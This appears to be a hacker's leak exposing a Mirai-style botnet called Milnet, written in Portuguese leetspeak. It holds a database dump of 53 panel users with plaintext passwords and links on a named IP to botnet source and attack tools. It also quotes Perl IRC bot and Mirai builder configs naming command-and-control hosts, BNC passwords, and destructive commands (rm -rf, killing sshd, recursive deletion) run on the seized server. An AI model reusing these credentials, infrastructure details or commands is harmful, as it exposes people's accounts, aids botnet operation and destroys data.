| id | username      | password          | duration_limit | cooldown | wrc  | last_paid  | max_bots | admin | intvl | api_key |
+----+---------------+-------------------+----------------+----------+------+------------+----------+-------+-------+---------+
|  1 | 0kxstroke     | thekingofhorizon  |              0 |        0 |    0 |          0 |       -1 |     1 |    30 |         |
| 14 | fall          | sudofall          |            300 |       30 | NULL | 1586539949 |     3500 |     0 |    30 | NULL    |
| 15 | alphapack1    | ?1234abcd         |           1000 |      500 | NULL | 1585271328 |     3000 |     0 |    30 | NULL    |
| 25 | adrymodz      | adriano2020       |            550 |       30 | NULL | 1583338945 |      550 |     0 |    40 | NULL    |
| 34 | lucan         | victor123         |            300 |       10 | NULL | 1577977404 |      550 |     0 |    30 | NULL    |
| 36 | root          | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 37 | Mamba         | Root123654@       |            700 |       30 | NULL | 1584576672 |       -1 |     0 |    30 | NULL    |
| 38 | hard4099      | milnetbot         |            300 |       30 | NULL | 1578362869 |      550 |     0 |    30 | NULL    |
| 39 | maroba        | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 40 | fenix         | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 41 | William       | 564564            |            800 |      400 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 43 | Dhenrique1    | diiair17121991    |            300 |       30 | NULL | 1578667514 |      550 |     0 |    30 | NULL    |
| 45 | Low           | Lowzin11@@        |            500 |       50 | NULL | 1584286745 |     1200 |     0 |    30 | NULL    |
| 49 | ih            | ih321             |            500 |       30 | NULL | 1586797453 |     1800 |     0 |    60 | NULL    |
| 50 | weazel        | Kitara12          |            500 |       30 | NULL | 1579114364 |     1200 |     0 |    30 | NULL    |
| 51 | Ukraine       | 190566            |            500 |       30 | NULL | 1579182986 |     1200 |     0 |    30 | NULL    |
| 52 | xclover       | floodm3           |            500 |       30 | NULL | 1579283174 |     1200 |     0 |    30 | NULL    |
| 53 | zb            | 040102            |            500 |       30 | NULL | 1582476343 |     1000 |     0 |    30 | NULL    |
| 54 | modus         | pipolo665         |            300 |      100 | NULL | 1579455904 |      880 |     0 |    30 | NULL    |
| 56 | estrela       | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 57 | sol           | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 58 | Gsa           | 1335!@#412        |            500 |       30 | NULL | 1579794807 |      500 |     0 |    30 | NULL    |
| 59 | Scop3xPXZ     | YouTube123        |            500 |       30 | NULL | 1579807374 |     1200 |     0 |    30 | NULL    |
| 60 | alphapack2    | ?1234abcd         |           1000 |      500 | NULL | 1585271330 |     3000 |     0 |    30 | NULL    |
| 61 | sh0x          | shox1533          |           1000 |       30 | NULL | 1588349236 |     3500 |     0 |    30 | NULL    |
| 62 | Jeferson      | jeferson731       |            300 |       30 | NULL | 1580503119 |      880 |     0 |    30 | NULL    |
| 63 | jeff          | jeff731           |            300 |       30 | NULL | 1580503285 |      880 |     0 |    30 | NULL    |
| 67 | raio          | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 69 | alphapack3    | ?1234abcd         |           1000 |      500 | NULL | 1585271346 |     3000 |     0 |    30 | NULL    |
| 70 | alphapack4    | ?1234abcd         |           1000 |      500 | NULL | 1585271349 |     3000 |     0 |    30 | NULL    |
| 71 | alphapack5    | ?1234abcd         |           1000 |      500 | NULL | 1585271350 |     3000 |     0 |    30 | NULL    |
| 72 | smoke         | smoke157          |            300 |       30 | NULL | 1582641644 |      550 |     0 |    30 | NULL    |
| 77 | adrymodz2     | MONZA2.0          |           1000 |       30 | NULL | 1586205190 |     3500 |     0 |    30 | NULL    |
| 78 | tripina       | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 79 | galax         | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 80 | foguete       | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 81 | nave          | 564564            |            800 |      800 | NULL | 1590013441 |     2500 |     0 |    30 | NULL    |
| 82 | Eletrick      | mateuskk123       |            500 |       20 | NULL | 1583863310 |     1200 |     0 |    30 | NULL    |
| 84 | projecthard   | projecthardbrasil |            500 |       30 | NULL | 1585083625 |     1200 |     0 |    30 | NULL    |
| 85 | Vendetta      | Joohzin           |            800 |       40 | NULL | 1585176180 |     2400 |     0 |    30 | NULL    |
| 86 | Andre3star    | Joohzin           |            300 |       30 | NULL | 1585176303 |      880 |     0 |    30 | NULL    |
| 88 | dark          | 98066414          |            500 |       30 | NULL | 1585784584 |     1200 |     0 |    30 | NULL    |
| 89 | VinieVih      | mercena1          |            350 |       30 | NULL | 1589395074 |      550 |     0 |    30 | NULL    |
| 90 | AdryKimber    | kimber2.0         |            300 |       30 | NULL | 1587356156 |     1200 |     0 |    30 | NULL    |
| 91 | Edgard        | Edy175635         |            400 |       30 | NULL | 1587871609 |     1200 |     0 |    30 | NULL    |
| 92 | Rodrigo_Modz  | 19952020          |            400 |       30 | NULL | 1588095831 |     1200 |     0 |    30 | NULL    |
| 93 | Flavio        | 23474321          |            300 |       30 | NULL | 1588104422 |      550 |     0 |    30 | NULL    |
| 94 | remidemi303   | Demi1321          |            400 |       30 | NULL | 1588630069 |     1200 |     0 |    30 | NULL    |
| 95 | Miguelangel13 | Miguel2113        |            400 |       30 | NULL | 1588828497 |     1200 |     0 |    30 | NULL    |
| 96 | DevSuper      | Kelvin11029       |            300 |       30 | NULL | 1588869224 |      880 |     0 |    30 | NULL    |
| 97 | CyberKB       | supreme1337       |            400 |       30 | NULL | 1589854787 |     1200 |     0 |    30 | NULL    |
| 98 | Foneety1001   | computador1001    |            300 |       30 | NULL | 1589922376 |      880 |     0 |    30 | NULL    |
| 99 | Olimpy        | olimpy0270        |            300 |       30 | NULL | 1589923747 |      880 |     0 |    30 | NULL    |
+----+---------------+-------------------+----------------+----------+------+------------+----------+-------+-------+---------+
53 rows in set (0.00 sec)



S0URC3 MILNET

http://200.20.227.67/.haxstr0ke_pwned/milnet.zip




L1ST4 D3 4LGUN5 4RQUI1V0S C0M0 B0T5 3 T00LZ


completo	http://200.20.227.67/.haxstr0ke_pwned/



phpmyadmin	http://200.20.227.67/.haxstr0ke_pwned/bots_e_t00l/vuln2.txt

iots 		200.20.227.67/.haxstr0ke_pwned/scanner/usno.txt

tomcat 		http://200.20.227.67/.haxstr0ke_pwned/jexboss.txt

sqlmap		http://200.20.227.67/.haxstr0ke_pwned/sql_output/





/* 4lgum4s c0nf1gs d3 b0t 3nc0ntr4d0 4qu1 */

my $servidor='avarice.ny.us.synirc.net' unless $servidor;
my $porta='6667';
my @canais=("#p5");
my @adms=("pw0x","r00x");

my $processo = 'sshd';
my $server  = "avarice.ny.us.synirc.net"; 
my $code = int(rand(100000));
my $channel = "#milenium";
my $port    =   6667;
my $nick    ="x0p$code";

my $servidor='irc-parabellum.duckdns.org' unless $servidor;
my $porta='6667';
my @canais=("#brasil");
my @adms=("r00x","brian","pw0x");

my $servidor='205.185.115.91' unless $servidor;
my $porta='8080';
my @canais=("#un1x");
my @adms=("r00x");

my $servidor='avarice.ny.us.synirc.net' unless $servidor; 
my $porta='6667';
my @canais=("#un1xl4nd"); 
my @adms=("r00x,mamba");

 _____________________________________
|                                     |
|        MIRAI PAYLOAD BUILDER        |
|          Made By DaddyL33T          |
|_____________________________________|

"""
import subprocess, sys, urllib
ip = "hasd7as6d23gh4.duckdns.org:8088"
exec_bin = "SSH scanner"
bin_prefix = "3atoNational."
bin_directory = "389242390482"
archs = ["x86",               #1


/* c0nf1gs d3 BNC */

my $PORTA       = 1983;
my $CRYPT_SENHA = '07bVPiBgDnF5M';
my $SENHA       = 'haxstr';


/* h4h4 */

~# nc localhost 8080

NOTICE AUTH :*** BNC Cristian LomenRey
NOTICE AUTH :*** Allnetwork � #Tembilahan
NOTICE AUTH :*** Type /PASS <yourpass>
pass haxstr
NOTICE AUTH :*** Password Accepted.
NOTICE AUTH :*** Type /CONN <ircserver[:port]>
NOTICE AUTH :*** For more information using Perl BNC type /BHELP
listids
NOTICE AUTH :***  - Listando IDs -
NOTICE AUTH :***  
NOTICE AUTH :*** 1 -> haxstroke@34.70.50.199:8080 (Em uso)



/*
   p4r4 f1n4l1z4 v4m0s m0v3r tud0 1550 p4r4 um lug4r s3gur0..

   [root@nationalserver /]# rm -rf /root (1h c0l31 0 c0m4nd0 3rr4d0 :S)

   b0m j4 qu3 fud3u td m3sm0 
   [root@nationalserver /]# kill `ps aux|grep sshd|grep pts|awk '{print $2}'`;echo "bye bye";find ./ * -exec rm { } ;

   bye bye





 	 gr33tz 4 t0d4 g4l3r4 4qu1 qu3 f3ch4 n0 3sg0t0 d4 1nt3rn3t 

		irc.efNet.org / irc.gigachat.org		    

			t0 b3 c0nt1nu3d...

 								 		       */